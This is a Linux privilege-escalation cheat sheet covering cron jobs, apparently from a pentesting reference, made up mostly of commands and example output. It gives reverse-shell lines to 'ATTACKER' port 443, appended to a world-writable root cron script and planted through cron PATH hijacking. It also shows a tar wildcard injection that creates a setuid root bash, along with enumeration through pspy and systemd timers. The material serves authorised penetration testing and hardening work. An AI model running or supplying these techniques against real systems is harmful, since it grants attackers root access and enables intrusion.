CRON JOBS
System cron jobs
Scheduled tasks — Scripts running as root
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
crontab -l -u <user>
Example Output
cat /etc/crontab
* * * * * root /opt/backup.sh
*/5 * * * * root /usr/local/bin/cleanup.py
ls -la /opt/backup.sh
-rwxrwxrwx 1 root root <- WORLD WRITABLE!
Writable cron scripts
Modify script to add reverse shell — Runs as the cron user (often root)
Check if you can write to scripts in crontab
Example Output
cat /etc/crontab:
* * * * * root /opt/backup.sh
ls -la /opt/backup.sh:
-rwxrwxrwx 1 root root
echo 'bash -i >& /dev/tcp/ATTACKER/443 0>&1' >> /opt/backup.sh
(Wait 1 minute for root reverse shell)
Cron PATH abuse
Script name matches cron command — Cron runs your script instead
If cron has custom PATH:
Create malicious script in earlier PATH dir
Example Output
cat /etc/crontab:
PATH=/home/user:/usr/local/sbin:/usr/local/bin
* * * * * root backup
echo '#!/bin/bash
bash -i >& /dev/tcp/ATTACKER/443 0>&1' > /home/user/backup
chmod +x /home/user/backup
(Cron finds your script first in PATH)
Cron wildcard injection
tar/rsync wildcard abuse — Filenames become command arguments
If cron runs: tar czf /tmp/backup.tar.gz *
Create files: --checkpoint=1 --checkpoint-action=exec=shell.sh
Example Output
Crontab: * * * * * root cd /var/www && tar czf /tmp/backup.tar.gz *
cd /var/www
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' > shell.sh
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
Wait 1 min, then:
/tmp/rootbash -p
# whoami
root
Monitor for hidden cron
Processes not visible in crontab — System timers, at jobs
pspy64 or pspy32 (run for 5 min)
Example Output
pspy64 output:
CMD: UID=0 PID=1234 | /bin/bash /root/secret_script.sh
CMD: UID=0 PID=1235 | /usr/bin/python3 /opt/hidden_task.py
(Found cron jobs not in crontab)
Systemd timers
Modern cron replacement — Check associated service files
systemctl list-timers --all
Example Output
systemctl list-timers
NEXT LEFT UNIT
Mon 10:00 2min backup.timer
cat /etc/systemd/system/backup.service
ExecStart=/opt/backup.sh
(Check if backup.sh is writable)